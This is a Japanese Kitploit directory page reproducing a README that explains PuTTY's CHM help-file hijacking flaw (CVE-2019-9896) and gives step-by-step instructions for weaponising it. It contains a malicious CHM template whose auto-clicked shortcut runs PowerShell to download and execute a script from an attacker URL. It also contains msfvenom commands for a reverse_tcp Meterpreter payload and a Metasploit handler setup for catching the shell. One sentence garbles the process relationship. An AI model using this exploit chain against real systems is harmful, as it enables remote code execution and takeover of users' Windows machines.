Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vuln-chm-hijack — CHMハイジャッキングを介した悪意のあるコード実行の可能性 (CVE-2019-9896) | Kitploit
ツール/GitHubGitHub/yasinyilmaz/vuln-chm-hijack
フィッシングツールペイロード生成エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubyasinyilmaz/vuln-chm-hijack

vuln-chm-hijack

CHMハイジャッキングを介した悪意のあるコード実行の可能性 (CVE-2019-9896)

リポジトリを見る
797年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PuTTY の脆弱性 vuln-chm-hijack

CHM ハイジャッキングによる悪意のあるコード実行の可能性

概要

バージョン 0.70 以前では、Windows 版 PuTTY GUI ツールのいずれかでオンラインヘルプを起動すると、そのツールは自身の実行ファイルと同じディレクトリを探してヘルプファイルを特定していました。

もし、無関係なコードがファイルを落とし込めるディレクトリ(例えば、ブラウザーの既定のダウンロードディレクトリから直接実行する場合など)から PuTTY を実行していたとすると、誰かが putty.chm というファイルをそのディレクトリに置くよう仕向けた場合(例えば、その名前のダウンロードリンクをクリックさせた場合)、PuTTY はそれを本物のヘルプファイルだと信じて htmlhelp.exe に渡してしまいます。

これは脆弱性です。HTML ヘルプファイル (.chm) は、Windows ショートカットである HTML 要素と、それをクリックする JavaScript を埋め込むことで、任意のコードを実行できるためです。

詳細: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html

CHM ファイルとは?

CHM は、Compiled HTML ファイル形式の拡張子で、最も一般的には Microsoft の HTML ベースのヘルププログラムで使用されます。多くの圧縮された HTML ドキュメントと、それらがリンクする画像や JavaScript を含めることができます。CHM の機能には、目次、インデックス、全文検索があります。

過去に使われた?

過去には、脅威アクターが CHM ファイルを使用してバックドアファイルを展開していました。これは標的型攻撃で一般的に使用されます。

いくつかの例:

https://www.bleepingcomputer.com/news/security/malicious-chm-files-being-used-to-install-brazilian-banking-trojans/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

悪意のある CHM ファイルを生成する手順

CHM ファイルを作成するには HTML Help Workshop ツールキットが必要です。インストール後、HTML Help Workshop ツールを起動します。

手順

File > New > Project をクリックし、以下の手順に従います:

HTML Help プロジェクトの作成

  1. [New Project] 画面で [Next] > [Browse] をクリック

  2. プロジェクトファイルの名前と、作成先の場所を指定します。

ファイル名: に「putty」と入力し、「Open」をクリックします。

HTML Help プロジェクトの指定

  1. プロジェクトに含める HTML ファイルをすでに作成している場合は、それを選択します。

HTML ファイル (.htm) を選択します。

.htm ファイルが保存されている場所を指定します。

[Add..] ボタンをクリックし、悪意のあるファイル(putty.htm など)を保存するために作成済みのディレクトリを選択します。

HTM ファイルの選択

  1. ウィザードが新しい HTML Help プロジェクトを作成します。ここで変更を加える必要があります。

  2. ツール上で、作成された htm をダブルクリックして編集し、以下のコードを挿入して基本的なヘルプファイルを作成します:

root@kitploit:~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>

  1. 次に、クリックすると悪意のある exe を起動するボタンオブジェクトを作成します。さらに、ドキュメントが開かれたときにボタンを自動的にクリックするスクリプト部分も追加します:
root@kitploit:~
<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{YOUR MALICIOUS FILE URL}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Welcome! </h3></p>
</body>
</html>

悪意のあるファイルの作成

  1. PowerShell コマンドは、指定されたリモート URL に接続し、サイトが応答する meterpreter を実行します。このリモートスクリプトは、別の PowerShell (.ps) スクリプトまたは Windows 用の Meterpreter ペイロードにすることができます。

Windows 用の単純な TCP Meterpreter ペイロードを作成するにはどうすればよいですか?

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST={YOUR IP} LPORT={PORT } -f exe > malware.exe

ヘルプボタンをダブルクリックすると、CHM バイナリファイルのインタープリタである malware.exe の子プロセスとして putty.exe が起動します。(悪意のある putty.chm と putty.exe ファイルは同じディレクトリに置く必要があります)

マルウェアを起動

meterpreter シェルを取得するにはどうすればよいですか?

root@kitploit:~
msfconsole 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost {YOUR IP}
lhost => {YOUR IP}
msf exploit(multi/handler) > set lport {PORT}
lport => {PORT}
msf exploit(multi/handler) > run

リソース:

  1. https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html
  2. https://safe-cyberdefense.com/hide-malware-microsoft-html-interpretors/

ツールをダウンロード